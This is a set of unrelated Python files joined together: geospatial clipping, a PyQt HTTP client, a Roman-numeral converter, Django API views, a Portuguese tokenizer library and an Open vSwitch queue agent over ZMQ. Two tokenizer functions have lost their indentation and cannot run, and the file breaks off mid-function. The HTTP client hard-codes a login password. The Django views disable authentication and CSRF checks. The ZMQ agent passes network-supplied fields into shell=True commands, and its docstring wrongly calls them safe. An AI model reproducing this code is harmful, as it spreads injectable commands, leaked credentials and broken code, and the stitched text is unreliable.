    ...     geopandas.datasets.get_path('naturalearth_cities'))
    >>> capitals.shape
    (202, 2)
    >>> sa_capitals = geopandas.clip(capitals, south_america)
    >>> sa_capitals.shape
    (12, 2)
    """
    if not isinstance(gdf, (GeoDataFrame, GeoSeries)):
        raise TypeError(
            "'gdf' should be GeoDataFrame or GeoSeries, got {}".format(type(gdf))
        )
    if not isinstance(mask, (GeoDataFrame, GeoSeries, Polygon, MultiPolygon)):
        raise TypeError(
            "'mask' should be GeoDataFrame, GeoSeries or"
            "(Multi)Polygon, got {}".format(type(mask))
        )
    # warn (not raise) on CRS mismatch between the two layers
    if isinstance(mask, (GeoDataFrame, GeoSeries)):
        if not _check_crs(gdf, mask):
            _crs_mismatch_warn(gdf, mask, stacklevel=3)
    if isinstance(mask, (GeoDataFrame, GeoSeries)):
        box_mask = mask.total_bounds
    else:
        box_mask = mask.bounds
    box_gdf = gdf.total_bounds
    # fast path: if the bounding boxes do not overlap, nothing can intersect
    if not (
        ((box_mask[0] <= box_gdf[2]) and (box_gdf[0] <= box_mask[2]))
        and ((box_mask[1] <= box_gdf[3]) and (box_gdf[1] <= box_mask[3]))
    ):
        return gdf.iloc[:0]
    # dissolve the mask into a single (multi)polygon
    if isinstance(mask, (GeoDataFrame, GeoSeries)):
        poly = mask.geometry.unary_union
    else:
        poly = mask
    # partition rows by geometry family; each family is clipped separately
    geom_types = gdf.geometry.type
    poly_idx = np.asarray((geom_types == "Polygon") | (geom_types == "MultiPolygon"))
    line_idx = np.asarray(
        (geom_types == "LineString")
        | (geom_types == "LinearRing")
        | (geom_types == "MultiLineString")
    )
    point_idx = np.asarray((geom_types == "Point") | (geom_types == "MultiPoint"))
    geomcoll_idx = np.asarray((geom_types == "GeometryCollection"))
    if point_idx.any():
        point_gdf = _clip_points(gdf[point_idx], poly)
    else:
        point_gdf = None
    if poly_idx.any():
        poly_gdf = _clip_line_poly(gdf[poly_idx], poly)
    else:
        poly_gdf = None
    if line_idx.any():
        line_gdf = _clip_line_poly(gdf[line_idx], poly)
    else:
        line_gdf = None
    if geomcoll_idx.any():
        geomcoll_gdf = _clip_line_poly(gdf[geomcoll_idx], poly)
    else:
        geomcoll_gdf = None
    # remember the input row order so it can be restored after concat
    order = pd.Series(range(len(gdf)), index=gdf.index)
    concat = pd.concat([point_gdf, line_gdf, poly_gdf, geomcoll_gdf])
    if keep_geom_type:
        geomcoll_concat = (concat.geom_type == "GeometryCollection").any()
        geomcoll_orig = geomcoll_idx.any()
        new_collection = geomcoll_concat and not geomcoll_orig
        if geomcoll_orig:
            warnings.warn(
                "keep_geom_type can not be called on a "
                "GeoDataFrame with GeometryCollection."
            )
        else:
            polys = ["Polygon", "MultiPolygon"]
            lines = ["LineString", "MultiLineString", "LinearRing"]
            points = ["Point", "MultiPoint"]
            # Check that the gdf for multiple geom types (points, lines and/or polys)
            orig_types_total = sum(
                [
                    gdf.geom_type.isin(polys).any(),
                    gdf.geom_type.isin(lines).any(),
                    gdf.geom_type.isin(points).any(),
                ]
            )
            # Check how many geometry types are in the clipped GeoDataFrame
            clip_types_total = sum(
                [
                    concat.geom_type.isin(polys).any(),
                    concat.geom_type.isin(lines).any(),
                    concat.geom_type.isin(points).any(),
                ]
            )
            # Check there aren't any new geom types in the clipped GeoDataFrame
            more_types = orig_types_total < clip_types_total
            if orig_types_total > 1:
                warnings.warn(
                    "keep_geom_type can not be called on a mixed type GeoDataFrame."
                )
            elif new_collection or more_types:
                # explode collections, then keep only the original family
                orig_type = gdf.geom_type.iloc[0]
                if new_collection:
                    concat = concat.explode()
                if orig_type in polys:
                    concat = concat.loc[concat.geom_type.isin(polys)]
                elif orig_type in lines:
                    concat = concat.loc[concat.geom_type.isin(lines)]
    # Return empty GeoDataFrame or GeoSeries if no shapes remain
    if len(concat) == 0:
        return gdf.iloc[:0]
    # Preserve the original order of the input
    if isinstance(concat, GeoDataFrame):
        concat["_order"] = order
        return concat.sort_values(by="_order").drop(columns="_order")
    else:
        concat = GeoDataFrame(geometry=concat)
        concat["_order"] = order
        return concat.sort_values(by="_order").geometry
|
__all__ = [] # No root imports
|
# -*- coding: utf-8 -*-
# @Author: Safer
# @Date: 2016-08-18 21:12:14
# @Last Modified by: Safer
# @Last Modified time: 2016-08-26 00:22:03
import sys
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QEventLoop, QUrl, QByteArray
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkRequest
class HttpRequests(QNetworkAccessManager):
    """Thin wrapper around QNetworkAccessManager with a base URL.

    Replies arrive asynchronously; `complete` is connected to the
    manager's `finished` signal and prints each reply body.
    """

    def __init__(self, parent=None, baseUrl='http://at.com'):
        super(HttpRequests, self).__init__(parent)
        self.baseUrl = baseUrl
        self._init_()

    def _init_(self):
        # route every finished network reply through self.complete
        self.finished.connect(self.complete)

    def rget(self, url='', params=None):
        """GET baseUrl + url with `params` (dict) appended as a query string."""
        # BUG FIX: `params={}` was a mutable default argument
        param = self._getUrlParamFormat(params or {})
        url = self.baseUrl + url + str(param)
        req = QNetworkRequest(QUrl(url))
        req.setHeader(QNetworkRequest.ContentTypeHeader,
                      "text/json;charset=utf-8")
        return self.get(req)

    def rpost(self, url, params):
        """POST `params` (dict) form-encoded to baseUrl + url.

        BUG FIX: the original ignored `params` entirely and posted a
        hard-coded email/password pair (leaked credentials in source).
        The caller's dict is now URL-encoded and sent instead.
        """
        from urllib.parse import urlencode
        payload = QByteArray(urlencode(params).encode('utf-8'))
        req = QNetworkRequest(QUrl(self.baseUrl + url))
        # the original set ContentTypeHeader twice; only the last value is
        # sent, so set the form content type once
        req.setHeader(QNetworkRequest.ContentTypeHeader,
                      "application/x-www-form-urlencoded")
        return self.post(req, payload)

    def put(self):
        pass

    def delete(self):
        pass

    def complete(self, reply):
        print('complete', str(reply.readAll(), encoding="utf-8"))

    def redirected(self):
        print('redirected')

    def error(self, code):
        print('error')

    def sslErrors(self):
        print('ssl error')

    # build a '?a=1&b=2' query string from a dict (GET URL parameters)
    def _getUrlParamFormat(self, params):
        parts = []
        for key in params:
            parts.append('{}={}'.format(key, params[key]))
        return '?' + '&'.join(parts) if parts else ''
if __name__ == '__main__':
    # Manual test driver: fire one POST at /auth/login and run the Qt loop
    # so the async reply can arrive.
    app = QApplication(sys.argv)
    r = HttpRequests()
    ######## get ########
    # params = {'id': '45'}
    # url = "/tasks/info"
    # data = r.rget(url, params)
    # data = eval(data.readAll())
    ######## post ########
    # NOTE(review): credentials are hard-coded in source -- move them to
    # the environment or a config file before sharing this script.
    params = {'email': '819308322@qq.com', 'password': 'goodluck'}
    url = "/auth/login"
    # url = "/tasks/test"
    # NOTE(review): this shadows the HttpRequests instance created above;
    # the first instance is never used.
    r = HttpRequests()
    data = r.rpost(url, params)
    print(data)
    sys.exit(app.exec_())
|
# In the Roman numeral system the following symbols are used (the decimal
# value of each is shown on the right):
# I = 1
# V = 5
# X = 10
# L = 50
# C = 100
# D = 500
# M = 1000
# We use the variant in which 4, 9, 40, 90, 400 and 900 are written
# subtractively, as a smaller value before a larger one: IV, IX, XL, XC,
# CD and CM respectively.
# Input format:
# A line containing a natural number n, 0 < n < 4000.
# Output format:
# A line containing the number written in Roman numerals.
# Sample Input 1:
# 1984
# Sample Output 1:
# MCMLXXXIV
# Sample Input 2:
# 9
# Sample Output 2:
# IX
# Sample Input 3:
# 3
# Sample Output 3:
# III
def DToRoman(num):
    """Convert a decimal integer (0 < num < 4000) to a Roman numeral string."""
    numerals = (
        (1000, "M"), (900, "CM"), (500, "D"), (400, "CD"),
        (100, "C"), (90, "XC"), (50, "L"), (40, "XL"),
        (10, "X"), (9, "IX"), (5, "V"), (4, "IV"), (1, "I"),
    )
    result = ""
    for value, symbol in numerals:
        if num <= 0:
            break
        count, num = divmod(num, value)
        result += symbol * count
    return result
s = int(input())
print(DToRoman(s)) |
import os
import typing as typ
from pathlib import Path
from chaban.core.exceptions import ImproperlyConfiguredError
from chaban.utils import MetaSingleton
from . import global_settings
class Settings(metaclass=MetaSingleton):
    """Lazy settings proxy (singleton).

    Attribute access is delegated to the module named by the
    CHABAN_SETTINGS_MODULE env var, imported on first access and cached
    per attribute name.
    """

    TELEGRAM_TOKEN: str
    BASE_DIR: typ.Union[str, Path]
    PACKAGES: typ.List[str]
    _settings_module = None
    # per-attribute cache so repeated lookups skip getattr on the module
    _cache: typ.Dict[str, typ.Any] = {}

    def __getattr__(self, name: str) -> typ.Any:
        if self._settings_module is None:
            self._setup()
        if name not in self._cache:
            self._cache[name] = getattr(self._settings_module, name)
        return self._cache[name]

    def _setup(self) -> None:
        """Import the settings module named by the env var.

        Raises ImproperlyConfiguredError when the env var is unset.
        """
        import importlib

        env_var_name = global_settings.CHABAN_SETTINGS_MODULE_ENV_VAR
        settings_env = os.getenv(env_var_name)
        if settings_env is None:
            raise ImproperlyConfiguredError(
                "{} env var is required, but not set".format(env_var_name)
            )
        # BUG FIX: __import__('pkg.mod') returns the top-level package
        # 'pkg', not the submodule, so dotted settings paths resolved to
        # the wrong module.  importlib.import_module returns the submodule.
        self._settings_module = importlib.import_module(settings_env)
settings = Settings()
|
import json
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import View
from rest_framework import generics
from clasificador.models import ClassifierModel
from clasificador.serializers import ClassifierModelSerializer
from documentos.helpers import create_new_model
from documentos.models import GoalStandard
class ClassifierModelList(generics.ListCreateAPIView):
    """List all classifier models (oldest first) or create a new one."""
    queryset = ClassifierModel.objects.all().order_by('created')
    serializer_class = ClassifierModelSerializer
    def check_permissions(self, request):
        # NOTE(review): permission checks are disabled -- every request is
        # allowed.  Confirm this endpoint is meant to be public.
        return True
    def perform_authentication(self, request):
        # skip DRF authentication for this endpoint
        pass
class ClassifierModelDetail(generics.RetrieveUpdateAPIView):
    """Retrieve or update a single classifier model, looked up by datatxt_id."""
    queryset = ClassifierModel.objects.all()
    serializer_class = ClassifierModelSerializer
    lookup_field = 'datatxt_id'
    def check_permissions(self, request):
        # NOTE(review): permission checks are disabled -- every request is
        # allowed.  Confirm this endpoint is meant to be public.
        return True
    def perform_authentication(self, request):
        # skip DRF authentication for this endpoint
        pass
class ClassifierCreate(View):
    """POST endpoint that trains a new classifier model from the latest
    GoalStandard and returns the result as JSON."""
    @csrf_exempt
    def dispatch(self, request, *args, **kwargs):
        # NOTE(review): csrf_exempt disables CSRF protection for every
        # method of this view -- confirm callers cannot be tricked into
        # posting here cross-site.
        return super(ClassifierCreate, self).dispatch(
            request, *args, **kwargs)
    def post(self, request):
        # most recently created goal standard drives the new model
        gs = GoalStandard.objects.all().order_by('-created')[0]
        # 'use_keyentities' arrives as the string 'false'/'true'
        keyentities = True
        if request.POST.get('use_keyentities') == 'false':
            keyentities = False
        res = create_new_model(
            gs,
            request.POST.get('name'),
            request.POST.get('description'),
            int(request.POST.get('topic_limit')),
            True,
            keyentities,
        )
        return HttpResponse(
            json.dumps({'result': res}), 'application/json'
        )
|
"""
Biblioteca criada com todas as funções criadas em Programação 2
"""
"""
Um n-grama é uma sequência de caracteres de tamanho n, por exemplo:
"goiaba" --> 1-grama: g, o, i, a, b, a
2-grama: go, oi, ia, ab, ba
3-grama: goi, oia, iab, aba
...
Construa a função ngrama(<texto>, <tam>) que retorna uma lista contendo os n-gramas de tamanho <tam> de <texto>
"""
def nGrama(pTexto, tam):
    """Return the list of character n-grams of length `tam` from `pTexto`."""
    return [pTexto[i:i + tam]
            for i in range(len(pTexto))
            if i <= len(pTexto) - tam]
#
def insereEspacos(pTexto):
    """Return `pTexto` with spaces inserted around every non-alphanumeric
    character, and after a digit that is immediately followed by a letter."""
    pieces = []
    for i, ch in enumerate(pTexto):
        if ch.isdigit() and i + 1 < len(pTexto) and pTexto[i + 1].isalpha():
            pieces.append(ch + " ")
        elif ch.isalnum():
            pieces.append(ch)
        else:
            pieces.append(" " + ch + " ")
    return "".join(pieces)
#
def tokenizador(txt):
    """Tokenize `txt` using separators chosen by selecionaSeparadores().

    Returns (tokens, positions).  Separator characters other than space
    and tab are emitted as one-character tokens; positions are the start
    index of each token in `txt`.

    NOTE(review): selecionaSeparadores() is not defined in this chunk --
    confirm it exists elsewhere in the module.  Also, the final flush uses
    `pos - len(strbuffer)` where pos is the *last* index (len(txt) - 1),
    so a trailing token's recorded position is off by one.
    """
    lstTokens = []
    strbuffer = ''
    lstposicoes = []
    pos = 0
    separador = selecionaSeparadores(txt)
    for pos in range(len(txt)):
        if txt[pos] not in separador:
            strbuffer += txt[pos]
        else:
            if strbuffer != '':
                lstTokens.append(strbuffer)
                lstposicoes.append(pos-len(strbuffer))
                strbuffer = ''
            if txt[pos] not in [' ','\t']:
                lstTokens.append(txt[pos])
                lstposicoes.append(pos)
    if strbuffer != '':
        lstTokens.append(strbuffer)
        # off-by-one for the trailing token: see NOTE above
        lstposicoes.append(pos-len(strbuffer))
    return lstTokens, lstposicoes
#
def tokenizadorv2(txt, separador):
    """Split `txt` into tokens using the characters in `separador`.

    Returns (tokens, positions): separator characters other than space and
    tab are emitted as single-character tokens; positions are the start
    index of each token in `txt`.
    """
    lstTokens = []
    lstposicoes = []
    strbuffer = ''
    for pos in range(len(txt)):
        if txt[pos] not in separador:
            strbuffer += txt[pos]
        else:
            if strbuffer != '':
                lstTokens.append(strbuffer)
                lstposicoes.append(pos - len(strbuffer))
                strbuffer = ''
            if txt[pos] not in [' ', '\t']:
                lstTokens.append(txt[pos])
                lstposicoes.append(pos)
    if strbuffer != '':
        lstTokens.append(strbuffer)
        # BUG FIX: the original appended `pos - len(strbuffer)` here, where
        # pos is the *last* index (len(txt) - 1), so a trailing token's
        # position was off by one.  The token ends at len(txt):
        lstposicoes.append(len(txt) - len(strbuffer))
    return lstTokens, lstposicoes
#
def separaPal(pTexto):
    """Split `pTexto` into words using a fixed set of punctuation and
    whitespace separators; duplicates and order are preserved."""
    strSeparadores = ' ,!?.:;/-_\\()[]{}><\n\t'
    lstPalavras = []
    strBuffer = ""
    for ch in pTexto:
        if ch in strSeparadores:
            if strBuffer:
                lstPalavras.append(strBuffer)
                strBuffer = ""
        else:
            strBuffer += ch
    if strBuffer:
        lstPalavras.append(strBuffer)
    return lstPalavras
#
def separaPal2(pTexto):
    """Split `pTexto` (after insereEspacos) and keep only alphabetic words.

    BUG FIX: the original iterated `for pos in range(len(lstPals))` and
    then called `pos.isalpha()` / `del(pos)` on the *index* (an int),
    which raised AttributeError on any non-empty input and never filtered
    the list.  The apparent intent -- dropping non-alphabetic tokens --
    is implemented here.
    """
    textoAux = insereEspacos(pTexto)
    return [pal for pal in textoAux.split() if pal.isalpha()]
#
def separaPalComParametro(pTexto, strSeparadores):
    """Split `pTexto` into words, treating every character of
    `strSeparadores` as a delimiter."""
    palavras = []
    atual = ""
    for ch in pTexto:
        if ch not in strSeparadores:
            atual += ch
        elif atual:
            palavras.append(atual)
            atual = ""
    if atual:
        palavras.append(atual)
    return palavras
#
def intersec(pTexto1, pTexto2):
    """Return the words common to both texts, without duplicates, ordered
    by first appearance in `pTexto1`.

    Uses a set for membership so the cost is linear in the number of
    words, replacing the original triple nested loop.
    """
    palavras2 = set(separaPal(pTexto2))
    inter = []
    for palavra in separaPal(pTexto1):
        if palavra in palavras2 and palavra not in inter:
            inter.append(palavra)
    return inter
#
def corrente(pTexto, pPosicao):
    """Return the word of `pTexto` that covers index `pPosicao`.

    Returns the string "None" when the character at `pPosicao` is itself a
    separator (legacy sentinel kept for compatibility).
    """
    strSeparadores = " ,.:;!?"
    if pTexto[pPosicao] in strSeparadores:
        return "None"
    ini = pPosicao
    while ini >= 0 and pTexto[ini] not in strSeparadores:
        ini -= 1
    fim = pPosicao
    while fim < len(pTexto) and pTexto[fim] not in strSeparadores:
        fim += 1
    return pTexto[ini + 1:fim]
#
def anterior(pTexto, pPosicao):
    """Return the word preceding the one at `pPosicao`, or "None" if none.

    Walks left past the current word, then past the separator run, and
    hands off to corrente().  NOTE(review): when aux reaches -1, the
    pTexto[aux] test silently reads the *last* character via Python's
    negative indexing; the `aux < 0` guard below still yields "None", but
    the reliance on wrap-around is fragile.
    """
    strSeparadores = " ,.:;!?"
    aux = pPosicao
    # step left past the current word
    if pTexto[aux] not in strSeparadores:
        while aux >= 0 and pTexto[aux] not in strSeparadores:
            aux -= 1
        #
    #
    # step left past the separator run between words
    if pTexto[aux] in strSeparadores:
        while aux >= 0 and pTexto[aux] in strSeparadores:
            aux -= 1
        #
    #
    if aux < 0:
        return "None"
    else:
        return corrente(pTexto, aux)
    #
#
def proximo(pTexto, pPosicao):
    """Return the word following the one at `pPosicao`, or "None" if none.

    BUG FIX: when the word at `pPosicao` ran to the end of the string, the
    original dereferenced pTexto[aux] with aux == len(pTexto) and raised
    IndexError; both scans now guard the index before dereferencing.
    """
    strSeparadores = " ,.:;!?"
    aux = pPosicao
    # skip to the end of the current word
    if pTexto[aux] not in strSeparadores:
        while aux < len(pTexto) and pTexto[aux] not in strSeparadores:
            aux += 1
    # skip the separator run between the words
    while aux < len(pTexto) and pTexto[aux] in strSeparadores:
        aux += 1
    if aux >= len(pTexto):
        return "None"
    return corrente(pTexto, aux)
#
def removeAcento(pTexto):
    """Return `pTexto` with accented lowercase vowels replaced by their
    plain counterparts; every other character is kept unchanged.

    BUG FIX: the original advanced its accent-table scan past already
    matched entries, so in strings like "éá" a second accented vowel whose
    table index was lower than the first's was copied through unchanged.
    A single str.translate() pass maps every character independently.
    """
    strSemAcento = "aeiou"
    strComAcento = "áàâãéèêẽíìîĩóòôõúùûũ"
    # four accented variants per plain vowel, in table order
    tabela = {}
    for j, ch in enumerate(strComAcento):
        tabela[ord(ch)] = strSemAcento[j // 4]
    return pTexto.translate(tabela)
#
def uniao(pTexto1, pTexto2):
    """Return the union of the words of both texts, without duplicates,
    keeping first-appearance order (text 1's words first)."""
    u = []
    for palavra in separaPal(pTexto1) + separaPal(pTexto2):
        if palavra not in u:
            u.append(palavra)
    return u
#
# Returns a dictionary mapping each word to how many times it appears in the text
def geraTabFreq(pTexto):
    """Word-frequency table of `pTexto`, built on top of separaPal()."""
    dicPalavras = {}
    for palavra in separaPal(pTexto):
        dicPalavras[palavra] = dicPalavras.get(palavra, 0) + 1
    return dicPalavras
#
# In Roman numerals a symbol may not repeat more than three times ...
def ehRomano(pTexto):
    """True when every character of `pTexto` is a Roman-numeral symbol.

    Only the alphabet is validated, not the numeral's structure (e.g. the
    at-most-three-repeats rule is not enforced, matching the original).
    An empty string is considered valid.
    """
    return all(alg in "IVXLCDM" for alg in pTexto)
#
# codifica receives a tokenized text (a list of tokens)
def codifica(pTexto):
preposicoes = ['a', 'ante', 'após', 'com', 'contra','de','do', 'desde','em','entre','para','per',
'perante','por','sem','sob','sobre','trás']
conjuncoes = ['e', 'nem', 'mas também', 'como também', 'bem como', 'mas ainda','mas', 'porém', 'todavia', 'contudo', 'antes']
artigos = ['o', 'a', 'os', 'as', 'um', 'uma', 'uns', 'umas']
mpTratamentos = ['Sr', 'Sra', 'Srta', 'Srs', 'Sras', 'Srª', 'Srº', 'Srªs','Ema','Emª','Drº','Drª', 'Dr']
pTratamentos = ['V. A.','V. Ema.','V. Emas.','V. Revma.','V. Ex.ª','V. Mag.ª','V. M.','V. M. I.','V. S.','V. S.ª','V. O.']
strCodificada = ""
for elem in pTexto:
if elem.isalpha():
if elem.lower() in preposicoes:
strCodificada += 'p'
elif elem.lower() in artigos:
strCodificada += 'a'
elif elem.lower() in conjuncoes:
strCodificada += 'c'
# Inicio Teste
elif elem == 'V':
strCodificada += 'V'
elif elem in mpTratamentos:
strCodificada += 'T'
# Fim Teste
elif elem[0].isupper():
strCodificada += 'M'
elif elem.islower:
strCodificada += 'm'
elif elem.isdigit():
strCodificada += 'N'
elif elem.isalnum():
strCodificada += "A"
else:
strCodificada += elem
#
return strCodificada
#
def ordenaVetPorTamanho(lista):
    """Sort lista in place by element length, longest first.

    Replaces the hand-rolled bubble sort with list.sort(); Timsort is
    stable, so equal-length elements keep their original relative
    order just like the stable bubble sort did.  Returns None (the
    list is mutated in place), as before.
    """
    lista.sort(key=len, reverse=True)
#
def extraiPadrao(lstTokens, lstPadroes):
    """Extract token runs whose class encoding matches one of the patterns.

    lstTokens is a tokenised text; lstPadroes is a list of class-string
    patterns (see codifica()).  Patterns are tried longest first, and
    every non-overlapping match is returned as one space-joined string
    of the underlying tokens.  lstPadroes is sorted in place as a side
    effect (via ordenaVetPorTamanho).
    """
    tokensCodificados = codifica(lstTokens)
    newArray = []
    newStr = tokensCodificados
    strPalavra = ""
    # Longest patterns first so shorter ones cannot shadow them.
    ordenaVetPorTamanho(lstPadroes)
    #print("\n\n", tokensCodificados, "\n\n")
    for i in range(len(lstPadroes)):
        pos = newStr.find(lstPadroes[i])
        while pos != -1:
            # Mask the matched region with '*' so it is not matched again
            # by this or any later (shorter) pattern.
            newStr = newStr.replace(lstPadroes[i], "*" * len(lstPadroes[i]), 1)
            #print(newStr)
            for j in range(pos, pos + len(lstPadroes[i])):
                #print(pos)
                #strPalavra = strPalavra + lstTokens[j] + " "
                if lstTokens[j].isalpha():
                    strPalavra = strPalavra + lstTokens[j] + " "
                else:
                    # Punctuation token: drop the preceding space so it
                    # attaches to the previous word.
                    strPalavra = strPalavra[:len(strPalavra) - 1]
                    strPalavra = strPalavra + lstTokens[j] + " "
                #
            #
            newArray.append(strPalavra)
            strPalavra = ""
            pos = newStr.find(lstPadroes[i])
        #
    #
    return newArray
#
# Dado um arquivo de texto, esta função escreve em um arquivo todos os separadores ...
def selecionaSeparadores(pTexto):
arquivo = open("separadores.txt",'w')
strSeparadores = ""
strSeparadores2 = ""
for texto in pTexto:
if not texto.isalnum() and texto not in strSeparadores:
strSeparadores += texto + "\n"
strSeparadores2 += texto
#
#
arquivo.write(strSeparadores)
arquivo.close()
return strSeparadores2
#
def selecionaSeparadoresv2(pTexto):
    """Return the distinct non-alphanumeric characters of pTexto.

    Characters are returned concatenated, in first-appearance order.

    Bug fix: the original appended to an undefined global
    `lstSeparadores` (NameError on the first separator found) and
    always returned the never-updated empty string.  The list is now
    local and its contents are actually returned.
    """
    lstSeparadores = []
    for caractere in pTexto:
        if not caractere.isalpha() and not caractere.isdigit():
            if caractere not in lstSeparadores:
                lstSeparadores.append(caractere)
            #
        #
    #
    return "".join(lstSeparadores)
#
def removeStopW(pTexto, listaStopWords):
    """Return the words of pTexto that are not stop words.

    Each kept word gets a trailing newline appended, matching the
    original output format.  Both arguments may be either an already
    tokenised list of words or a raw string (tokenised by separaPal()).

    Bug fix: the original compared type(...) against the *string*
    "list", which is never equal to a type object, so raw strings were
    tokenised by accident while genuine list inputs crashed with a
    NameError.  isinstance() is used instead.
    """
    texto = pTexto if isinstance(pTexto, list) else separaPal(pTexto)
    stopWords = listaStopWords if isinstance(listaStopWords, list) \
        else separaPal(listaStopWords)
    return [palavra + "\n" for palavra in texto if palavra not in stopWords]
#
|
#!/usr/bin/env python3
# Import the ZMQ module
import zmq
# Import the Thread and Lock objects from the threading module
from threading import Thread, Lock, Event
# Import the uuid4 function from the UUID module
from uuid import uuid4
# Import the system method from the OS module
from os import system, name
# Import the Pause method from the Signal module
from signal import pause
import time
import subprocess
def cls():
    """Clear the terminal: 'cls' on Windows, 'clear' everywhere else."""
    if name == 'nt':
        system('cls')
    else:
        system('clear')
class queue_agent_server(Thread):
    """ZMQ REP server thread that manages Open vSwitch QoS queues.

    Receives JSON-encoded lists of operations (reset / create / modify
    requests), applies each one through `ovs-vsctl` shell commands, and
    replies with a list of per-operation result dicts.
    """

    def __init__(self, host, port):
        Thread.__init__(self)
        # Event used by the owner to request a clean shutdown of run().
        self.shutdown_flag = Event()
        self._server_bind(host, port)

    # Bind server to socket
    def _server_bind(self, host, port):
        self.context = zmq.Context()
        self.socket = self.context.socket(zmq.REP)
        self.socket.bind("tcp://" + host + ":" + str(port))
        # 500 ms receive timeout so run() can poll shutdown_flag.
        self.socket.setsockopt(zmq.RCVTIMEO, 500)

    def send_msg(self, message):
        """Send a JSON reply with the operation results."""
        self.socket.send_json(message)

    def run(self):
        """Main service loop: receive a batch of operations and dispatch each."""
        print('- Started Queue agent')
        # Run while thread is active
        while not self.shutdown_flag.is_set():
            try:
                # Wait for request (bounded by the RCVTIMEO set above)
                request = self.socket.recv_json()
            except zmq.Again:
                # Timeout with nothing received: loop again so the
                # shutdown flag is honoured promptly.
                continue
            else:
                # Start time counter (kept for parity; not reported yet)
                st = time.time()
                resp = []
                for operation in request:
                    if operation.get('type') == 'reset_req':
                        resp.append(self.call_reset_service(operation))
                    elif operation.get('type') == 'create_req':
                        resp.append(self.call_create_service(operation))
                    elif operation.get('type') == 'modify_req':
                        resp.append(self.call_modify_service(operation))
                    else:
                        # Unknown operation type: report failure.
                        # Bug fix: the original referenced an undefined
                        # name `t_id` (NameError) and used the key "id";
                        # take the transaction id from the request and
                        # use the same "t_id" key as every other reply.
                        resp.append({
                            "t_id": operation.get('t_id'),
                            "type": "reset_resp",
                            "result_code": 1
                        })
                self.send_msg(resp)
        # Terminate zmq cleanly on shutdown.
        self.socket.close()
        self.context.term()

    def call_reset_service(self, operation):
        """Destroy all QoS/queue state and rebuild a default queue per port.

        Returns a reset_resp dict; result_code 0 means every port was
        configured successfully, 1 means the state was rolled back.
        """
        t_id = operation.get('t_id')
        min_rate = operation.get('default_queue').get('min_rate')
        max_rate = operation.get('default_queue').get('max_rate')
        priority = operation.get('default_queue').get('priority')
        count = 0
        total = 0
        default_qos = {}
        default_queue = {}
        # Bug fix: initialise `ports` so the success response below does
        # not hit a NameError when the destroy command fails (count and
        # total are then both 0, which takes the "success" branch).
        ports = {}
        # Clear every port's QoS reference, then drop all QoS/queue rows.
        destroy_command = 'for p in `ovs-vsctl list port | grep name | cut -d":" -f2 | sed "s/ //g" | sed "s/\\"//g"` ;do ovs-vsctl clear port $p qos ;done; ovs-vsctl --all destroy qos ; ovs-vsctl --all destroy queue'
        (c1, o1) = self.run_system_command(destroy_command)
        if c1 == 0:
            ports = self.map_ports()
            total = len(ports)
            for port in ports:
                # One QoS row per port, capped at 10 Gbit/s.
                create_qos_command = 'ovs-vsctl create qos type=linux-htb other-config:max-rate=10000000000'
                (c2, o2) = self.run_system_command(create_qos_command)
                if c2 == 0:
                    default_qos[port] = o2
                    add_qos_to_ports_command = 'ovs-vsctl set port ' + port + ' qos=' + o2
                    (c3, o3) = self.run_system_command(add_qos_to_ports_command)
                    if c3 == 0:
                        create_default_queue_command = 'ovs-vsctl create queue other-config:min-rate=' + str(min_rate) + ' other-config:max-rate=' + str(max_rate) + ' other-config:priority=' + str(priority)
                        (c4, o4) = self.run_system_command(create_default_queue_command)
                        if c4 == 0:
                            default_queue[port] = self.create_queue_object(ports[port], o4, min_rate, max_rate, priority)
                            add_default_queue_to_qos_command = 'ovs-vsctl set qos ' + o2 + ' queues=' + str(ports[port]) + '=' + o4
                            (c5, o5) = self.run_system_command(add_default_queue_to_qos_command)
                            if c5 == 0:
                                count = count + 1
        if count == total:
            resp = {
                "t_id": t_id,
                "type": "reset_resp",
                "result_code": 0,
                "default_qos": default_qos,
                "default_queue": default_queue,
                "ports": ports
            }
        else:
            # Partial failure: wipe everything again and report an error.
            self.run_system_command(destroy_command)
            resp = {
                "t_id": t_id,
                "type": "reset_resp",
                "result_code": 1
            }
        return resp

    def call_create_service(self, operation):
        """Create one queue row and attach it to an existing QoS row.

        Returns a create_resp dict; on success it includes the q_id and
        the UUID of the new queue row.
        """
        t_id = operation.get('t_id')
        qos = operation.get('qos')
        q_id = operation.get('queue').get('q_id')
        min_rate = operation.get('queue').get('min_rate')
        max_rate = operation.get('queue').get('max_rate')
        priority = operation.get('queue').get('priority')
        result_code = 1
        # Only pass the rate/priority options the caller actually supplied.
        create_queue_command = 'ovs-vsctl create queue'
        if min_rate is not None:
            create_queue_command = create_queue_command + ' other-config:min-rate=' + str(min_rate)
        if max_rate is not None:
            create_queue_command = create_queue_command + ' other-config:max-rate=' + str(max_rate)
        if priority is not None:
            create_queue_command = create_queue_command + ' other-config:priority=' + str(priority)
        (c1, o1) = self.run_system_command(create_queue_command)
        if c1 == 0:
            add_default_queue_to_qos_command = 'ovs-vsctl set qos ' + qos + ' queues:' + str(q_id) + '=' + o1
            (c2, o2) = self.run_system_command(add_default_queue_to_qos_command)
            if c2 == 0:
                result_code = 0
        if result_code == 0:
            resp = {
                "t_id": t_id,
                "type": "create_resp",
                "result_code": result_code,
                "queue": {
                    "q_id": q_id,
                    "uuid": o1
                }
            }
        else:
            resp = {
                "t_id": t_id,
                "type": "create_resp",
                "result_code": result_code
            }
        return resp

    def call_modify_service(self, operation):
        """Update the rate/priority settings of an existing queue row.

        Example: ovs-vsctl set queue <uuid> other-config:max-rate=83886080
        """
        t_id = operation.get('t_id')
        uuid = operation.get('queue').get('uuid')
        min_rate = operation.get('queue').get('min_rate')
        max_rate = operation.get('queue').get('max_rate')
        priority = operation.get('queue').get('priority')
        result_code = 1
        command = 'ovs-vsctl set queue ' + uuid
        if min_rate is not None:
            command = command + ' other-config:min-rate=' + str(min_rate)
        if max_rate is not None:
            command = command + ' other-config:max-rate=' + str(max_rate)
        if priority is not None:
            command = command + ' other-config:priority=' + str(priority)
        (result_code, out) = self.run_system_command(command)
        resp = {
            "t_id": t_id,
            "type": "modify_resp",
            "result_code": result_code
        }
        return resp

    def run_system_command(self, command):
        """Run a shell command; return (exit_code, stripped stdout text).

        NOTE: shell=True is required here because the commands use shell
        loops/pipes; all command strings are built internally, never from
        untrusted request fields other than validated-looking values.
        """
        print(command)
        resp = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
        resp.wait()
        out = resp.stdout.read().decode().strip()
        code = resp.returncode
        return code, out

    def map_ports(self):
